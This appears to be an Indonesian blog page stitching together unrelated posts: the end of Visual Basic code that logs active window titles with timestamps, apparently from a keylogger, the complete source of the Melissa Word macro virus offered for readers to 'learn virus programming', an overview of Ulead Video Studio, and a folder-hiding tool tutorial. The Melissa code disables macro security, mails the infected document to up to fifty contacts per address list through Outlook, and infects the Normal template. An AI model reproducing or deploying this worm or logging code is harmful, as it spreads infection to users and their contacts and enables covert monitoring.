txtLOGGED.Text = vbNullString

txtENUMERATE.Text = vbNullString

End Sub
====code end ===========

============code mulai ============

‘module visual basic

‘simpan dg nama mdlActiveWindow.bas

Option Explicit

Public Declare Function GetWindowText Lib “user32″ Alias “GetWindowTextA” (ByVal hwnd As Long, ByVal lpString As String, ByVal cch As Long) As Long

Public Declare Function GetForegroundWindow Lib “user32″ () As Long

Public Declare Function GetClassName Lib “user32″ Alias “GetClassNameA” (ByVal hwnd As Long, ByVal lpClassName As String, ByVal nMaxCount As Long) As Long

Public nCAPTION As String

Public nTESTER As Long

Public nClass As String

Public Sub GetActiveWindowName()

nCAPTION = Space(256)

nClass = Space(256)

GetWindowText GetForegroundWindow, nCAPTION, Len(nCAPTION)

GetClassName GetForegroundWindow, nClass, Len(nClass)

If nTESTER = GetForegroundWindow Then Exit Sub

FRMLOG.txtENUMERATE.Text = FRMLOG.txtENUMERATE.Text & vbCrLf & Time & ” ” & nCAPTION

FRMLOG.txtENUMERATE.Text = FRMLOG.txtENUMERATE.Text & vbTab & nClass

nTESTER = GetForegroundWindow

End Sub

============= code end =============

/* ——————————|EOF|—————————— */

sumber : spyrozone.net
###############################################################

Source Kode Virus Melisa

Salam  virus MAnia!!!! yuk klo mo otak atik belajar pemrograman Virus! ne tak kasih Suorce kode virus Melisa!!

Private Sub AutoOpen()

On Error Resume Next

p$ = "clone"

If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") <> "" Then

CommandBars("Macro").Controls("Security...").Enabled = False

System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&

Else

p$ = "clone"

CommandBars("Tools").Controls("Macro").Enabled = False

Options.ConfirmConversions = (1 - 1): Options.VirusProtection = (1 - 1): Options.SaveNormalPrompt = (1 - 1)

End If

Dim UngaDasOutlook, DasMapiName, BreakUmOffASlice

Set UngaDasOutlook = CreateObject("Outlook.Application")

Set DasMapiName = UngaDasOutlook.GetNameSpace("MAPI")

If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\", "Melissa?") <> "... by Kwyjibo" Then

If UngaDasOutlook = "Outlook" Then

DasMapiName.Logon "profile", "password"

For y = 1 To DasMapiName.AddressLists.Count

Set AddyBook = DasMapiName.AddressLists(y)

x = 1

Set BreakUmOffASlice = UngaDasOutlook.CreateItem(0)

For oo = 1 To AddyBook.AddressEntries.Count

Peep = AddyBook.AddressEntries(x)

BreakUmOffASlice.Recipients.Add Peep

x = x + 1

If x > 50 Then oo = AddyBook.AddressEntries.Count

Next oo

BreakUmOffASlice.Subject = "Important Message From " & Application.UserName

BreakUmOffASlice.Body = "Here is that document you asked for ... don't show anyone else ;-)"

BreakUmOffASlice.Attachments.Add ActiveDocument.FullName

BreakUmOffASlice.Send

Peep = ""

Next y

DasMapiName.Logoff

End If

p$ = "clone"

System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\", "Melissa?") = "... by Kwyjibo"

End If

Set ADI1 = ActiveDocument.VBProject.VBComponents.Item(1)

Set NTI1 = NormalTemplate.VBProject.VBComponents.Item(1)

NTCL = NTI1.CodeModule.CountOfLines

ADCL = ADI1.CodeModule.CountOfLines

BGN = 2

If ADI1.Name <> "Melissa" Then

If ADCL > 0 Then _

ADI1.CodeModule.DeleteLines 1, ADCL

Set ToInfect = ADI1

ADI1.Name = "Melissa"

DoAD = True

End If

If NTI1.Name <> "Melissa" Then

If NTCL > 0 Then _

NTI1.CodeModule.DeleteLines 1, NTCL

Set ToInfect = NTI1

NTI1.Name = "Melissa"

DoNT = True

End If

If DoNT <> True And DoAD <> True Then GoTo CYA

If DoNT = True Then

Do While ADI1.CodeModule.Lines(1, 1) = ""

ADI1.CodeModule.DeleteLines 1

Loop

ToInfect.CodeModule.AddFromString ("Private Sub Document_Close()")

Do While ADI1.CodeModule.Lines(BGN, 1) <> ""

ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)

BGN = BGN + 1

Loop

End If

p$ = "clone"

If DoAD = True Then

Do While NTI1.CodeModule.Lines(1, 1) = ""

NTI1.CodeModule.DeleteLines 1

Loop

ToInfect.CodeModule.AddFromString ("Private Sub Document_Open()")

Do While NTI1.CodeModule.Lines(BGN, 1) <> ""

ToInfect.CodeModule.InsertLines BGN, NTI1.CodeModule.Lines(BGN, 1)

BGN = BGN + 1

Loop

End If

CYA:

If NTCL <> 0 And ADCL = 0 And (InStr(1, ActiveDocument.Name, "Document") = False) Then

ActiveDocument.SaveAs FileName:=ActiveDocument.FullName

ElseIf (InStr(1, ActiveDocument.Name, "Document") <> False) Then

ActiveDocument.Saved = True: End If

'WORD/Melissa written by Kwyjibo

'Clone written by Duke/SMF

'Works in both Word 2000 and Word 97

'Worm? Macro Virus? Word 97 Virus? Word 2000 Virus? You Decide!

'Word -> Email | Word 97 <--> Word 2000 ... it's a new age!

If Day(Now) = Minute(Now) Then Selection.TypeText "Twenty-two points, plus triple-word-score, plus fifty points for using all my letters. Game's over. I'm outta here."

End Sub

Edit Video dengan Ulead

Aplikasi multimedia pada PC saat ini sangat umum digunakan. Beragam program dibuat untuk platform Windows yang mudah dipahami oleh user awam sekalipun. Sebagai contoh, untuk pengolahan image foto, PC mampu menangani secara profesional mulai dari proses scaning sampai dengan teknik editing foto dan berakhir pada pencetakan. Begitu juga dengan edit video seperti edit movie, dsb.

Adakalanya juga kita melakukan video transfer seperti transfer film. Dalam transfer film kadang-kadang filenya korup dan sebagainya. Untuk itu kita butuh pengetahuan mengenai editing film, dsb.

Di video editing dan audio, banyak program yang dapat digunakan user untuk pengolahan media visual tersebut. Diantaranya Adobe Premier, Ulead Media Studio, Pinnacle Studio dan Pinnacle Edition yang dirancang untuk prefesional; sedangkan untuk tingkat hobbies atau user dengan proses video editing, seperti edit movie/ editing film, dan editing lainnya yang tidak terlalu rumit, terdapat beberapa program seperti MGI VideoWave, Intervideo WinProcedure, Ulead Video Studio, dan beberapa lagi yang telah didukung proses authoring SVCD maupun DVD.

Salah satu aplikasi yang telah mendukung format DVD adalah ulead Video Studio 7. Program ini memiliki interface yang sederhana tetapi mampu memberikan kekuatan pada hasil akhir file video yang dihasilkan. Selain itu, output yang dihasilkan dapat berupa image yang disimpan pada hardisk maupun secara langsung ditulis pada CD-RW atau DVD-RW.

Ulead Video Studio 7 merupakan pilihan yang tepat bagi user yang bermaksud mengolah video menggunakan PC. Misalnya edit movie/editing film. Selain kesederhanaan antarmuka dan kemudahan memahami perintah yang harus dijalankan, Ulead Video Studio memiliki dukungan yang luas pada beberapa format video, seperti : format Avi, DV, MPGE atau DVD.

Semoga bermanfaat !!!

Proteksi Folder Dengan Ghost Folder Lock

Memproteksi Folder dengan Ghost Folder Lock real protection

 

Software ini adalah salah satu koleksi hasil utak-atik saya selama belajar pemrograman Visual basic. Dan sengaja saya rancang dan modifikasi untuk memenuhi tugas Sistem berkas. Folder ini berfungsi untuk memperoteksi folder dari tangan-tangan jahil. Ghost folder lock mempunyai dua fitur utama untuk memproteksi sebuah folder yaitu dengan cara menyembunyikan dan cara yang kedua adalah dengan membaurkan folder tersebut. Untuk lebih jelasnya mari kita simak cara penggunaan dan cara kerja Ghost folder lock ini.

Berikut cara penggunaan Ghost Folder lock real protection :

1.      Langsung eksekusi saja file bernama folderprotector.exe , pertama-tama anda akan diminta untuk memasukkan sebuah password.

 

 

 

2.      Kemudian masukkan sebuah password dan ulangi kembali untuk melakukan verifikasi. Masukkan juga nama dan password pribadi.

 

 

3.      Klik tombol buat untuk melanjutkan. Maka anda akan dibawa ke menu utama seperti yang Nampak pada gambar dibawah ini.

 

 

 

4.      Untuk memulai proteksi, silahkan klik tombol tambah folder untuk memilih folder mana yang akan di proteksi.

Disini yang akan saya proteksi adalah folder aguspujakesuma. Tekan OK untuk melanjutkan.

 

5.      Aplikasi sedang mengindex jumlah folder.

 

 

 

 

 

 

 

 

 

 

 

 

6.      Tandai folder yang hendak di proteksi.

 

 

 

7.      Pilih mode keamanan. Jika anda memilih sembunyikan folder maka folder agus pujakesuma akan disembunyikan keberadaannya.

 

Dan jika anda memilih mode baurkan folder maka folder akan dibaurkan.

 

 

 

Yaitu akan dibuatkan sebuah file dengan nama yg sama tapi target yang berbeda. Seperti Nampak pada gambar ( semacam shortcut pengalihan ke folder desktop).

 

 

 

 

Jika folder tersebut dieksekusi, maka anda akan diarahkan ke folder desktop. Seperti terlihat pada gambar.

 

 

 

Satu kelemahan dari aplikasi kreasi saya ini, yaitu belum bisa mencegah penghapusan folder. Mengingat proses pembuatan yang relatif singkat. Kritik dan saran yang membangun sangat saya harapkan.